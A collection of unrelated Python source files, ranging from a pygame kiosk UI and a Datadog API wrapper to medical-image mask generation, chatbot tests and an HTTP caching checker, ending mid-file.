csv_path_processed(2012).endswith('\\data\\processed\\2012.csv') #def tempfile(filename: str): # return make_data_path('temp', filename)
StarcoderdataPython
3558448
from argparse import ArgumentParser from sys import stdin from mlmorph import Generator, Analyser def main(): """Invoke a simple CLI analyser or generator.""" a = ArgumentParser() a.add_argument('-i', '--input', metavar="INFILE", type=open, dest="infile", help="source of analysis data") a.add_argument('-a', '--analyse', action='store_true', help="Analyse the input file strings") a.add_argument('-g', '--generate', action='store_true', help="Generate the input file strings") a.add_argument('-v', '--verbose', action='store_true', help="print verbosely while processing") options = a.parse_args() if not options.infile: options.infile = stdin if options.verbose: print("reading from", options.infile.name) analyser = Analyser() generator = Generator() for line in options.infile: line = line.strip() if not line or line == '': continue if options.analyse: anals = analyser.analyse(line, True) if not anals: print(line, "\t?") for anal in anals: print(line, "\t", anal[0], "\t", anal[1]) if options.generate: gens = generator.generate(line, True) if not gens: print(line, "\t?") for gen in gens: print(line, "\t", gen[0], "\t", gen[1]) print() exit(0) if __name__ == "__main__": main()
StarcoderdataPython
3305205
import pygame from sys import exit #from KinectTools import PyKinectRuntime #from KinectTools import PyKinectV2 import ctypes from Stamina.stamina import stamina from faceRecognition.Login import login from faceRecognition.Signup import signup from utils.utils import scale from utils.utils import choose,click class ui(object): def __init__(self,n): self.SCREEN_WIDTH= int(2160 / n) self.SCREEN_HEIGHT= int(3840 / n) self.n = n self.start_flag = 0 pygame.init() self._clock = pygame.time.Clock() self.screen = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT),pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.RESIZABLE,32) self.display_surface = pygame.Surface((self.SCREEN_WIDTH,self.SCREEN_HEIGHT)) pygame.display.set_caption('v0.1') #self.start = Image("images/poster.png", (0, 0), self.screen) #self.stat = self.start.image #self.position = self.start.image.get_rect() # # def load_face_images(self): # self.login = # self.signup = # # def start(self,position): # # start = Image("images/poster.png",(0,0),self.screen) # self.start.render(position) def load_set_images(self): #self.background = pygame.Surface((1080,1920)) #self.background.fill((255,255,255)) self.zhidao_image = pygame.image.load('images/1.jpeg') self.zhidao_image = pygame.transform.smoothscale(self.zhidao_image,(int(168 * 5.76 / self.n),int(259 * 5.76 / self.n))) self.zh = (16*self.SCREEN_WIDTH)/375 self.zz = (189*self.SCREEN_HEIGHT)/667 self.display_surface.blit(self.zhidao_image,(self.zh,self.zz)) self.meiyan_image = pygame.image.load('images/2.jpeg') self.meiyan_image = pygame.transform.smoothscale(self.meiyan_image, (int(168 * 5.76 / self.n), int(120 * 5.76 /self.n))) self.mh = (16 * self.SCREEN_WIDTH) / 375 self.mz = (456 * self.SCREEN_HEIGHT) / 667 self.display_surface.blit(self.meiyan_image, (self.mh, self.mz)) self.pinggu_image = pygame.image.load('images/3.jpeg') self.pinggu_image = pygame.transform.smoothscale(self.pinggu_image, (int(168 * 5.76 /self.n), int(164 * 5.76 / self.n))) self.ph = (192 * self.SCREEN_WIDTH) / 375 self.pz = (189 * self.SCREEN_HEIGHT) / 667 self.display_surface.blit(self.pinggu_image, (self.ph, self.pz)) self.baogao_image = pygame.image.load('images/4.jpeg') self.baogao_image = pygame.transform.smoothscale(self.baogao_image, (int(168 * 5.76 /self.n), int(215 * 5.76 / self.n))) self.bh = (192 * self.SCREEN_WIDTH) / 375 self.bz = (361 * self.SCREEN_HEIGHT) / 667 self.display_surface.blit(self.baogao_image, (self.bh, self.bz)) # self.bh = (192 * self.SCREEN_WIDTH / 375) # self.bz = (361 * self.SCREEN_HEIGHT / 667) # self.baogao_image = Image("images/4.jpeg",None,(self.bh,self.bz)) # #self.baogao_image.update() # self.display_surface.blit(self.baogao_image.image,(self.bh,self.bz)) # # # self.meiyan_image = pygame.image.load('images/2.jpg') # mwidth = (int)(self.meiyan_image.get_width()*1.43/self.n) # mheight = (int)(self.meiyan_image.get_height()*1.43/self.n) # self.meiyan_image = pygame.transform.scale(self.meiyan_image,(mwidth,mheight)) # self.screen.blit(self.meiyan_image,[16/375*self.SCREEN_WIDTH,456/667*self.SCREEN_HEIGHT]) # # self.jiance_image = pygame.image.load('images/3.jpg') # width = (int)(self.jiance_image.get_width()*1.44/self.n) # height = (int)(self.jiance_image.get_height()*1.44/self.n) # self.jiance_image = pygame.transform.scale(self.jiance_image,(width,height)) # self.screen.blit(self.jiance_image,[192/375 * self.SCREEN_WIDTH,189/667*self.SCREEN_HEIGHT]) # # self.baogao_image = pygame.image.load('images/4.jpg') # width = (int)(self.baogao_image.get_width()*1.44/self.n) # height = (int)(self.baogao_image.get_height()*1.44/self.n) # self.baogao_image = pygame.transform.scale(self.baogao_image,(width,height)) # self.screen.blit(self.baogao_image,[192/375 * self.SCREEN_WIDTH,361/667 *self.SCREEN_HEIGHT]) # self.logo_image = pygame.image.load('images/logo2.png') self.logo_image = pygame.transform.smoothscale(self.logo_image, (int(82 * 5.76 / self.n), int(74 * 5.76 / self.n))) self.lh = (150 * self.SCREEN_WIDTH) / 375 self.lz = (44 * self.SCREEN_HEIGHT) / 667 self.display_surface.blit(self.logo_image, (self.lh, self.lz)) # width = (int)(41 * 2 * 2 / self.n) # height = (int)(37 * 2 * 2 / self.n) # self.logo_image = pygame.transform.scale(self.logo_image,(width,height)) # self.screen.blit(self.logo_image,[172/375* self.SCREEN_WIDTH,44/667 * self.SCREEN_HEIGHT]) # self.menu = pygame.image.load("images/menu.png").convert_alpha() # mwidth = (int)(self.menu.get_width()*1.43/self.n) # mheight = (int)(self.menu.get_height()*1.43/self.n) # self.menu = pygame.transform.scale(self.menu,(mwidth,mheight)) # self.display_surface.blit(self.menu,[0,0]) def change_mode(self): if click(self.pinggu_image,(self.ph,self.pz)): print("into2") return 2 def run(self): #self.screen.blit(self.display_surface,[0,0]) # self.start.render((0,0)) # h = 0 while self.start_flag == 0: for event in pygame.event.get(): if event.type == pygame.QUIT: pygame.quit() exit() print("set_images...") self.load_set_images() self.screen.blit(self.display_surface,(0,0)) if self.change_mode() == 2: print("kinect will work!") self.start_flag = 1 pygame.display.update() self._clock.tick(60) c = stamina(self.screen,self.n) c.run() print("kinect ends")
StarcoderdataPython
8048704
__all__ = [ 'InfrastructureApi', ] class InfrastructureApi(object): def search(self, query): """ Search datadog for hosts and metrics by name. The search *query* can be faceted to limit the results (e.g. ``"hosts:foo"``, or ``"metrics:bar"``) or un-faceted, which will return results of all types (e.g. ``"baz"``). Return a dictionary mapping each queried facet to a list of name strings. >>> dog_http_api.search("cassandra") { "results": { "hosts": ["cassandraHostA", "cassandraHostB", ...], "metrics": ["cassandra.load", "cassandra.requests", ...] } } """ return self.http_request('GET', '/search', q=query, response_formatter=lambda x: x['results'], ) def all_tags(self, source=None): """ Get a list of tags for your org and their member hosts. >>> dog_http_api.all_tags() [ { 'tag1': [ 'host1', 'host2', ... ] }, ... ] """ params = {} if source: params['source'] = source return self.http_request('GET', '/tags/hosts', response_formatter=lambda x: x['tags'], **params ) def host_tags(self, host_id, source=None, by_source=False): """ Get a list of tags for the specified host by name or id. >>> dog_http_api.host_tags('web.example.com') ['web', 'env:production'] >>> dog_http_api.host_tags(1234) ['database', 'env:test'] """ params = {} if source: params['source'] = source if by_source: params['by_source'] = 'true' return self.http_request('GET', '/tags/hosts/' + str(host_id), response_formatter=lambda x: x['tags'], **params ) def add_tags(self, host_id, tags, source=None): """add_tags(host_id, [tag1, tag2, ...]) Add one or more tags to a host. >>> dog_http_api.add_tags(host_id, ['env:test']) >>> dog_http_api.add_tags(host_id, ['env:test', 'database']) """ if isinstance(tags, basestring): tags = [tags] body = { 'tags': tags, } params = {} if source: params['source'] = source return self.http_request('POST', '/tags/hosts/' + str(host_id), body, response_formatter=lambda x: x['tags'], **params ) def change_tags(self, host_id, tags, source=None): """change_tags(host_id, [tag1, tag2, ...]) Replace a host's tags with one or more new tags. >>> dog_http_api.change_tags(host_id, ['env:test']) >>> dog_http_api.change_tags(host_id, ['env:test', 'database']) """ if isinstance(tags, basestring): tags = [tags] body = { 'tags': tags } params = {} if source: params['source'] = source return self.http_request('PUT', '/tags/hosts/' + str(host_id), body, response_formatter=lambda x: x['tags'], **params ) def detach_tags(self, host_id, source=None): """ Remove all tags from a host. >>> dog_http_api.detach_tags(123) """ params = {} if source: params['source'] = source return self.http_request('DELETE', '/tags/hosts/' + str(host_id), **params )
StarcoderdataPython
4848827
<gh_stars>1-10 import web, datetime db = web.database(dbn='mysql', db='webpy_demo', user='dbuser',pw="<PASSWORD>") def get_posts(): return db.select('entries', order='id DESC') def get_post(id): try: return db.select('entries', where='id=$id', vars=locals())[0] except IndexError: return None def new_post(title, text): db.insert('entries', title=title, content=text, posted_on=datetime.datetime.utcnow()) def del_post(id): db.delete('entries', where="id=$id", vars=locals()) def update_post(id, title, text): db.update('entries', where="id=$id", vars=locals(), title=title, content=text)
StarcoderdataPython
6581038
<reponame>3dimaging/DeepLearningCamelyon_II #!/home/wli/env python3 # -*- coding: utf-8 -*- """ Title: convert XML to binary mask ================================= Created: 10-31-2019 Python-Version: 3.5, 3.6 Description: ------------ This module is used to generate binary mask files from the annotations (XML files). This module is needed for generating mask files for testing WSIs because the code coming with ASAP showed errors for mask generation on certain testing WSIs. Inputs: ******* xml_folder = '/raida/wjc/CAMELYON16/testing/lesion_annotations' slide_folder = '/raida/wjc/CAMELYON16/testing/images' level = 5 : the level of zoom (0 is the highest; 5 is the 32x downsampled image from level 0). Output: ******* result_folder = '/raidb/wli/testing_1219/mask_for_testing_wsi' Note: ----- If you need more information about how ElementTree package handle XML file, please follow the link: #https://docs.python.org/3/library/xml.etree.elementtree.html """ import math import glob import pandas as pd import xml.etree.ElementTree as et from pandas import DataFrame import openslide import numpy as np import cv2 import matplotlib.pyplot as plt import logging import os.path as osp import sys sys.path.append('/home/weizhe.li/dldp/utils/logman') sys.path.append('/home/weizhe.li/dldp/utils') # setup_logging import fileman as fm import logger_management from logger_management import log_with_template from logger_management import StreamToLogger from logger_management import setup_logging # import multiresolutionimageinterface as mir # reader = mir.MultiResolutionImageReader() # mr_image = reader.open('/home/wli/Downloads/tumor_036.tif') # Ximageorg, Yimageorg = mr_image.getDimensions() # dims = mr_image.getLevelDimensions(4) # Ximage = (Ximage+240//2)//240 # Ximage = 4000 # Yimage = (Yimage+240//2)//240 # Yimage = 2000 class mask_generator(object): """ The class is used to generate a single mask file (not pyramid) based on xml file. """ def __init__(self, xml_file, level, dims): """ variables initialization :param xml_file: :param level: :param dims: :param result_folder: """ self.xml_file = xml_file self.level = level self.dims = dims self.result_folder = result_folder def convert_xml_df(self): """ To convert a xml file to a series of dataframes in a tuple. :return: df_xml: x, y coordinates :rtype: dataframe """ down_sample = 2**self.level parseXML = et.parse(self.xml_file) root = parseXML.getroot() dfcols = ['Name', 'Order', 'X', 'Y'] df_xml = pd.DataFrame(columns=dfcols) for child in root.iter('Annotation'): for coordinate in child.iter('Coordinate'): Name = child.attrib.get('Name') Order = coordinate.attrib.get('Order') X_coord = float(coordinate.attrib.get('X')) X_coord = X_coord//down_sample #X_coord = X_coord/down_sample Y_coord = float(coordinate.attrib.get('Y')) Y_coord = Y_coord//down_sample #Y_coord = Y_coord/down_sample df_xml = df_xml.append(pd.Series( [Name, Order, X_coord, Y_coord], index=dfcols), ignore_index=True) # type: DataFrame df_xml = pd.DataFrame(df_xml) print('redundent xml:', df_xml.shape) return df_xml # x_values = list(annotations['X'].get_values()) # y_values = list(annotations['Y'].get_values()) # xy = list(zip(x_values,y_values)) def points_collection(self, annotations): """ remove the duplicated coordinates due to the down_sampling :param duplicate: :return: list with no duplicates :rtype: list """ final_name_list = list(annotations['Name'].unique()) coxy = [[] for x in range(len(final_name_list))] for index, n in enumerate(final_name_list): newx = annotations[annotations['Name'] == n]['X'] newy = annotations[annotations['Name'] == n]['Y'] newxy = list(zip(newx, newy)) coxy[index] = np.array(newxy, dtype=np.int32) return (coxy, final_name_list) def mask_gen(self, coxy, result_folder): """ generate a binary mask file :param final_list: the down-sampled annotation :type final_list: list :param result_folder: :type result_folder:str :return: mask file :rtype: tif file """ # image = cv2.imread('/home/wli/Downloads/tumor_036.xml', -1) canvas = np.zeros((int(self.dims[1]//2**self.level), int(self.dims[0]//2**self.level)), np.uint8) # canvas = np.zeros((int(dims[1]/32), int(dims[0]/32)), np.uint8) # tile =mr_image.getUCharPatch(0, 0, dims[0], dims[1], 4) # canvas = np.zeros((Ximage, Yimage, 3), np.uint8) # fix the division # coords = np.array([xy], dtype=np.int32) # cv2.drawContours(canvas, [coords],-1, (0,255,0), -1) # cv2.drawContours(canvas, coxy, -1, (255, 255, 255), 10) # cv2.drawContours(canvas, coxy, -1, (255, 255, 255), CV_FILLED) cv2.fillPoly(canvas, pts=coxy, color=(255, 255, 255)) # cv2.polylines(canvas, coxy, isClosed=True, color=(255,255,255), # thickness=5) cv2.imwrite('%s/%s.png' % (result_folder, osp.splitext(osp.basename(self.xml_file))[0]), canvas) # cv2.imshow("tile", tile);cv2.waitKey();cv2.destroyAllWindows() # cv2.fillConvexPoly(mask, coords,1) # mask = mask.astype(np.bool) # output = np.zeros_like(image) # output[mask] = image[mask] # cv2.imshow('image',output) # cv2.waitKey(0) # cv2.destroyAllWindows() class lesion_count(mask_generator): def __init__(self): super().__init__ def gen_lesion_table(self, coxy, final_name_list): lesion_total = [] for coord, lesion_name in list(zip(coxy, contour_names)): M = cv2.moments(coord) cX = int(M["m10"] / M["m00"]) cY = int(M["m01"] / M["m00"]) lesion_total.append([lesion_name, (cX, cY), cv2.contourArea(coord)]) return lesion_total if __name__ == '__main__': # setup_logging module_name = sys.modules['__main__'].__file__ log_template_path = '/home/weizhe.li/dldp/utils/logman/logging_config.yaml' # The log template is also inculded in this package. # log_template_path = '.../dldp/utils/logman/logging_config.yaml' logger = log_with_template(log_template_path, module_name) # xml_folder = '/home/wzli/Downloads/CAMELYON16/testing/ # lesion_annotations/' # xml_folder = '/home/wzli/Downloads/CAMELYON16/training/ # lesion_annotations_training/' xml_folder = '/projects01/wxc4/wli/CAMELYON16/lesion_annotations' xml_paths = fm.list_file_in_dir_II(xml_folder, 'xml') logger.debug('the fist xml file is %s' % xml_paths[0]) # xml_paths = glob.glob(osp.join(xml_folder, '*.xml')) # xml_paths.sort() # slide_folder = '/home/wzli/Downloads/CAMELYON16/testing/images/' slide_folder = '/projects01/wxc4/CAMELYON16-training/tumor' result_folder = '/projects01/wxc4/wli/CAMELYON16/lesion_counts' created_folder = fm.creat_folder('', result_folder) # slide_paths = glob.glob(osp.join(slide_folder, '*.tif')) level = 5 ############################lesion count####################################### lesion_total = [] col_names = ['slide_name', 'lesion_name', 'centroid', 'area'] for xml_file in xml_paths: slide_name = osp.basename(xml_file.replace('.xml', '.tif')) slide_path = osp.join(slide_folder, slide_name) wsi_image = openslide.open_slide(slide_path) dims = wsi_image.dimensions mask_gen = mask_generator(xml_file, level, dims) annotations = mask_gen.convert_xml_df() final_annotations, _ = mask_gen.points_collection(annotations) # mask_gen.mask_gen(final_annotations, reult_folder) lesion_stat = lesion_count(xml_file, level, dims) annotations = lesion_stat.convert_xml_df() final_annotations, lesion_names = lesion_stat.points_collection(annotations) slide_lesions = lesion_stat.gen_lesion_table(final_annotations, lesion_names) lesion_total.append(slide_lesions) df_lesion_stat = pd.DataFrame(lesion_total, columns=col_names) df_lesion_stat.to_csv(result_folder)
StarcoderdataPython
12801785
import os import shutil from pathlib import Path import dash from dash import html from dash import dcc class DashboardObject: def __init__(self, title, description = "", dependencies = [], meta = None): self.title = title self.description = description self.dependencies = dependencies self.meta = meta def build(self, path): for dep in self.dependencies: shutil.copyfile(dep, path.joinpath(dep.name)) def render(self, dashboard): return html.Div(children=[ html.H2(self.title), dcc.Markdown(self.description), html.Pre(self.meta["env"]["uname"]), self._render(dashboard) ], className="dashboard-object") def _render(self, dashboard): pass class Graph(DashboardObject): def __init__(self, figure, title, description = "", meta = None): super().__init__(title, description, meta=meta) figure.update_layout(template="plotly_dark") self._figure = figure def _render(self, dashboard): return dcc.Graph(figure=self._figure) class Component(DashboardObject): def __init__(self, component, title, description = "", dependencies = []): super().__init__(title, description, dependencies) self._component = component def _render(self, dashboard): return self._component class Image(DashboardObject): def __init__(self, path, title, description = ""): super().__init__(title, description) self.path = Path(path) self.dependencies.append(self.path) def _render(self, dashboard): return html.Img(src=dashboard.asset(self.path.name)) class Dashboard: def __init__(self, title): self.title = title self.asset_dir = Path(os.environ["OVE_PROJECT_DIR"]).joinpath("dashboard/assets") self.figure_dir = self.asset_dir.joinpath("figures") self._built = False self._objects = [] self._app = dash.Dash(__name__, assets_folder=self.asset_dir.absolute()) def add(self, obj): self._objects.append(obj) return self def build(self): self.figure_dir.mkdir(parents = True, exist_ok = True) for obj in self._objects: obj.build(self.figure_dir) self._built = True return self def render(self): return html.Main([obj.render(self) for obj in self._objects]) def serve(self): assert(self._built) self._app.layout = html.Div(children=[ html.H1(["WARA-SW TEP Dashboard: ", html.B(self.title)]), self.render() ]) self._app.run_server(debug=True) def asset(self, path): return self._app.get_asset_url(str(Path("figures").joinpath(path)))
StarcoderdataPython
1846763
<reponame>nilsreichert/core """The RegisterController Module.""" from config import auth from masonite.auth import Auth from masonite.helpers import password as bcrypt_password from masonite.request import Request from masonite.view import View from masonite.auth import MustVerifyEmail from masonite.managers import MailManager class RegisterController: """The RegisterController class.""" def __init__(self): """The RegisterController Constructor.""" pass def show(self, request: Request, view: View): """Show the registration page. Arguments: Request {masonite.request.request} -- The Masonite request class. Returns: masonite.view.View -- The Masonite View class. """ return view.render('auth/register', {'app': request.app().make('Application'), 'Auth': Auth(request)}) def store(self, request: Request, mail_manager: MailManager): """Register the user with the database. Arguments: request {masonite.request.Request} -- The Masonite request class. Returns: masonite.request.Request -- The Masonite request class. """ user = auth.AUTH['model'].create( name=request.input('name'), password=<PASSWORD>(request.input('password')), email=request.input('email'), ) if isinstance(user, MustVerifyEmail): user.verify_email(mail_manager, request) # Login the user if Auth(request).login(request.input(auth.AUTH['model'].__auth__), request.input('password')): # Redirect to the homepage return request.redirect('/home') # Login failed. Redirect to the register page. return request.redirect('/register')
StarcoderdataPython
8164010
<gh_stars>0 #!/usr/bin/env python # Title: UAV client # Description: Randomly generates peoples poses and sends them to the RabbitMQ server # Engineer: <NAME> # Email: <EMAIL> # Lab: Autonomous Controls Lab, The University of Texas at San Antonio ######### Libraries ################### import numpy as np import random import pika import time import matplotlib.pyplot as plt import yaml import json ### Read config parameters for RabbitMQ with open('config.yaml') as f: config = yaml.safe_load(f) hostname = config['hostname'] username = config['username'] password = config['password'] port = config['port'] credentials = pika.PlainCredentials(username, password) connection = None colors = ['b','g','y','k','c','r'] auction_count = 0 curr_num_auction = 0 boat_ids = [] curr_time = None # Receive messages from UAVs and publish to Clustering def callback(ch, method, properties, body): global auction_count, curr_num_auction, boat_ids, curr_time auction_info = json.loads(body.decode('utf-8')) if auction_info['boat_id'] not in boat_ids: boat_ids.append(auction_info['boat_id']) fig = plt.gcf() ax = fig.gca() plt.scatter(float(auction_info['x_position']),float(auction_info['y_position']),c=colors[boat_ids.index(auction_info['boat_id'])%len(colors)],s=5) circle1=plt.Circle((float(auction_info['x_position']),float(auction_info['y_position'])),color=colors[boat_ids.index(auction_info['boat_id'])%len(colors)], radius=20,fill=False) plt.ylim([-300,300]) plt.xlim([-300,300]) ax.add_artist(circle1) print(curr_time, auction_info['time_stamp']) if curr_time != auction_info['time_stamp']: curr_time = auction_info['time_stamp'] plt.draw() plt.pause(0.1) fig.clear() if __name__ == '__main__': # Establish incoming connection from Speed Clusters connection_in = pika.BlockingConnection(pika.ConnectionParameters(host=hostname, credentials=credentials, port=port)) channel_in = connection_in.channel() channel_in.exchange_declare(exchange='auctioning_info', exchange_type='direct') result_in = channel_in.queue_declare(exclusive=True) queue_in_name = result_in.method.queue channel_in.queue_bind(exchange='auctioning_info',queue=queue_in_name,routing_key='key_auctioning_info') # Indicate queue readiness print(' [*] Waiting for messages. To exit, press CTRL+C') # Consumption configuration channel_in.basic_consume(callback,queue=queue_in_name,no_ack=False) # Begin consuming from UAVs plt.draw() plt.pause(0.01) channel_in.start_consuming()
StarcoderdataPython
60253
#!/usr/bin/python import sqlite3 uId = 4 con = sqlite3.connect('ydb.db') with con: cur = con.cursor() cur.execute("SELECT name, price FROM cars WHERE Id=:Id", {"Id": uId}) row = cur.fetchone() print(f"{row[0]}, {row[1]}")
StarcoderdataPython
3503554
<filename>tests/test_dynamic_models.py """Trial runs on DynamicBot with the TestData Dataset.""" import time import logging import unittest import numpy as np import tensorflow as tf import pydoc from pydoc import locate import data import chatbot from utils import io_utils, bot_freezer from tests.utils import * class TestDynamicModels(unittest.TestCase): def setUp(self): tf.logging.set_verbosity('ERROR') def test_create_bot(self): """Ensure bot constructor is error-free.""" logging.info("Creating bot . . . ") bot = create_bot() self.assertIsInstance(bot, chatbot.DynamicBot) def test_save_bot(self): """Ensure we can save to bot ckpt dir.""" bot = create_bot() self.assertIsInstance(bot, chatbot.DynamicBot) def test_save_bot(self): """Ensure teardown operations are working.""" bot = create_bot() self.assertIsInstance(bot, chatbot.DynamicBot) logging.info("Closing bot . . . ") bot.close() def test_train(self): """Simulate a brief training session.""" flags = TEST_FLAGS flags = flags._replace(model_params=dict( **flags.model_params, reset_model=True, steps_per_ckpt=10)) bot = create_bot(flags) self._quick_train(bot) def test_base_methods(self): """Call each method in chatbot._models.Model, checking for errors.""" bot = create_bot() logging.info('Calling bot.save() . . . ') bot.save() logging.info('Calling bot.freeze() . . . ') bot.freeze() logging.info('Calling bot.close() . . . ') bot.close() def test_manual_freeze(self): """Make sure we can freeze the bot, unfreeze, and still chat.""" # ================================================ # 1. Create & train bot. # ================================================ flags = TEST_FLAGS flags = flags._replace(model_params=dict( ckpt_dir=os.path.join(TEST_DIR, 'out'), reset_model=True, steps_per_ckpt=20, max_steps=40)) bot = create_bot(flags) self.assertEqual(bot.reset_model, True) # Simulate small train sesh on bot. bot.train() # ================================================ # 2. Recreate a chattable bot. # ================================================ # Recreate bot from scratch with decode set to true. logging.info("Resetting default graph . . . ") tf.reset_default_graph() flags = flags._replace(model_params={ **flags.model_params, 'reset_model': False, 'decode': True, 'max_steps': 100, 'steps_per_ckpt': 50}) self.assertTrue(flags.model_params.get('decode')) bot = create_bot(flags) self.assertTrue(bot.is_chatting) self.assertTrue(bot.decode) print("Testing quick chat sesh . . . ") config = io_utils.parse_config(flags=flags) dataset_class = pydoc.locate(config['dataset']) \ or getattr(data, config['dataset']) dataset = dataset_class(config['dataset_params']) test_input = "How's it going?" encoder_inputs = io_utils.sentence_to_token_ids( tf.compat.as_bytes(test_input), dataset.word_to_idx) encoder_inputs = np.array([encoder_inputs[::-1]]) bot.pipeline._feed_dict = { bot.pipeline.user_input: encoder_inputs} # Get output sentence from the chatbot. _, _, response = bot.step(forward_only=True) print("Robot:", dataset.as_words(response[0][:-1])) # ================================================ # 3. Freeze the chattable bot. # ================================================ logging.info("Calling bot.freeze() . . . ") bot.freeze() # ================================================ # 4. Try to unfreeze and use it. # ================================================ logging.info("Resetting default graph . . . ") tf.reset_default_graph() logging.info("Importing frozen graph into default . . . ") frozen_graph = bot_freezer.load_graph(bot.ckpt_dir) logging.info("Extracting input/output tensors.") tensors, frozen_graph = bot_freezer.unfreeze_bot(bot.ckpt_dir) self.assertIsNotNone(tensors['inputs']) self.assertIsNotNone(tensors['outputs']) with tf.Session(graph=frozen_graph) as sess: raw_input = "How's it going?" encoder_inputs = io_utils.sentence_to_token_ids( tf.compat.as_bytes(raw_input), dataset.word_to_idx) encoder_inputs = np.array([encoder_inputs[::-1]]) feed_dict = {tensors['inputs'].name: encoder_inputs} response = sess.run(tensors['outputs'], feed_dict=feed_dict) logging.info('Reponse: %s', response) def test_memorize(self): """Train a bot to memorize (overfit) the small test data, and show its responses to all train inputs when done. """ flags = TEST_FLAGS flags = flags._replace(model_params=dict( ckpt_dir='out/test_data', reset_model=True, steps_per_ckpt=300, state_size=128, embed_size=32, max_steps=300)) flags = flags._replace(dataset_params=dict( max_seq_len=20, data_dir=TEST_DATA_DIR)) print('TEST_FLAGS', flags.dataset) bot, dataset = create_bot(flags=flags, return_dataset=True) bot.train() # Recreate bot (its session is automatically closed after training). flags = flags._replace(model_params={ **flags.model_params, 'reset_model': False, 'decode': True}) bot, dataset = create_bot(flags, return_dataset=True) for inp_sent, resp_sent in dataset.pairs_generator(): print('\nHuman:', inp_sent) response = bot.respond(inp_sent) if response == resp_sent: print('Robot: %s\nCorrect!' % response) else: print('Robot: %s\nExpected: %s' % ( response, resp_sent)) def _quick_train(self, bot, num_iter=10): """Quickly train manually on some test data.""" coord = tf.train.Coordinator() threads = tf.train.start_queue_runners(sess=bot.sess, coord=coord) for _ in range(num_iter): bot.step() summaries, loss, _ = bot.step() bot.save(summaries=summaries) coord.request_stop() coord.join(threads)
StarcoderdataPython
8054022
#!/usr/bin/env python """ Cacheability checking function. """ from redbot.formatter import relative_time, f_num from redbot.message import HttpRequest, HttpResponse from redbot.speak import Note, categories, levels ### configuration cacheable_methods = ['GET'] heuristic_cacheable_status = ['200', '203', '206', '300', '301', '410'] max_clock_skew = 5 # seconds def checkCaching(response: HttpResponse, request: HttpRequest=None) -> None: "Examine HTTP caching characteristics." # get header values lm_hdr = response.parsed_headers.get('last-modified', None) date_hdr = response.parsed_headers.get('date', None) expires_hdr = response.parsed_headers.get('expires', None) etag_hdr = response.parsed_headers.get('etag', None) age_hdr = response.parsed_headers.get('age', None) cc_set = response.parsed_headers.get('cache-control', []) cc_list = [k for (k, v) in cc_set] cc_dict = dict(cc_set) cc_keys = list(cc_dict.keys()) # Last-Modified if lm_hdr: serv_date = date_hdr or response.start_time if lm_hdr > serv_date: response.add_note('header-last-modified', LM_FUTURE) else: response.add_note('header-last-modified', LM_PRESENT, last_modified_string=relative_time(lm_hdr, serv_date)) # known Cache-Control directives that don't allow duplicates known_cc = ["max-age", "no-store", "s-maxage", "public", "private", "pre-check", "post-check", "stale-while-revalidate", "stale-if-error"] # check for mis-capitalised directives / # assure there aren't any dup directives with different values for cc in cc_keys: if cc.lower() in known_cc and cc != cc.lower(): response.add_note('header-cache-control', CC_MISCAP, cc_lower=cc.lower(), cc=cc) if cc in known_cc and cc_list.count(cc) > 1: response.add_note('header-cache-control', CC_DUP, cc=cc) # Who can store this? if request and request.method not in cacheable_methods: response.store_shared = response.store_private = False request.add_note('method', METHOD_UNCACHEABLE, method=request.method) return # bail; nothing else to see here elif 'no-store' in cc_keys: response.store_shared = response.store_private = False response.add_note('header-cache-control', NO_STORE) return # bail; nothing else to see here elif 'private' in cc_keys: response.store_shared = False response.store_private = True response.add_note('header-cache-control', PRIVATE_CC) elif request and 'authorization' in [k.lower() for k, v in request.headers] \ and 'public' not in cc_keys: response.store_shared = False response.store_private = True response.add_note('header-cache-control', PRIVATE_AUTH) else: response.store_shared = response.store_private = True response.add_note('header-cache-control', STOREABLE) # no-cache? if 'no-cache' in cc_keys: if lm_hdr is None and etag_hdr is None: response.add_note('header-cache-control', NO_CACHE_NO_VALIDATOR) else: response.add_note('header-cache-control', NO_CACHE) return # pre-check / post-check if 'pre-check' in cc_keys or 'post-check' in cc_keys: if 'pre-check' not in cc_keys or 'post-check' not in cc_keys: response.add_note('header-cache-control', CHECK_SINGLE) else: pre_check = post_check = None try: pre_check = int(cc_dict['pre-check']) post_check = int(cc_dict['post-check']) except ValueError: response.add_note('header-cache-control', CHECK_NOT_INTEGER) if pre_check is not None and post_check is not None: if pre_check == 0 and post_check == 0: response.add_note('header-cache-control', CHECK_ALL_ZERO) elif post_check > pre_check: response.add_note('header-cache-control', CHECK_POST_BIGGER) post_check = pre_check elif post_check == 0: response.add_note('header-cache-control', CHECK_POST_ZERO) else: response.add_note('header-cache-control', CHECK_POST_PRE, pre_check=pre_check, post_check=post_check) # vary? vary = response.parsed_headers.get('vary', set()) if "*" in vary: response.add_note('header-vary', VARY_ASTERISK) return # bail; nothing else to see here elif len(vary) > 3: response.add_note('header-vary', VARY_COMPLEX, vary_count=f_num(len(vary))) else: if "user-agent" in vary: response.add_note('header-vary', VARY_USER_AGENT) if "host" in vary: response.add_note('header-vary', VARY_HOST) # calculate age response.age = age_hdr or 0 age_str = relative_time(response.age, 0, 0) if date_hdr and date_hdr > 0: apparent_age = max(0, int(response.start_time - date_hdr)) else: apparent_age = 0 current_age = max(apparent_age, response.age) current_age_str = relative_time(current_age, 0, 0) if response.age >= 1: response.add_note('header-age header-date', CURRENT_AGE, age=age_str) # Check for clock skew and dateless origin server. if not date_hdr: response.add_note('', DATE_CLOCKLESS) if expires_hdr or lm_hdr: response.add_note('header-expires header-last-modified', DATE_CLOCKLESS_BAD_HDR) else: skew = date_hdr - response.start_time + (response.age) if response.age > max_clock_skew and (current_age - skew) < max_clock_skew: response.add_note('header-date header-age', AGE_PENALTY) elif abs(skew) > max_clock_skew: response.add_note('header-date', DATE_INCORRECT, clock_skew_string=relative_time(skew, 0, 2)) else: response.add_note('header-date', DATE_CORRECT) # calculate freshness freshness_lifetime = 0 has_explicit_freshness = False has_cc_freshness = False freshness_hdrs = ['header-date'] if 's-maxage' in cc_keys: freshness_lifetime = cc_dict['s-maxage'] freshness_hdrs.append('header-cache-control') has_explicit_freshness = True has_cc_freshness = True elif 'max-age' in cc_keys: freshness_lifetime = cc_dict['max-age'] freshness_hdrs.append('header-cache-control') has_explicit_freshness = True has_cc_freshness = True elif 'expires' in response.parsed_headers: # An invalid Expires header means it's automatically stale has_explicit_freshness = True freshness_hdrs.append('header-expires') freshness_lifetime = (expires_hdr or 0) - (date_hdr or int(response.start_time)) freshness_left = freshness_lifetime - current_age freshness_left_str = relative_time(abs(int(freshness_left)), 0, 0) freshness_lifetime_str = 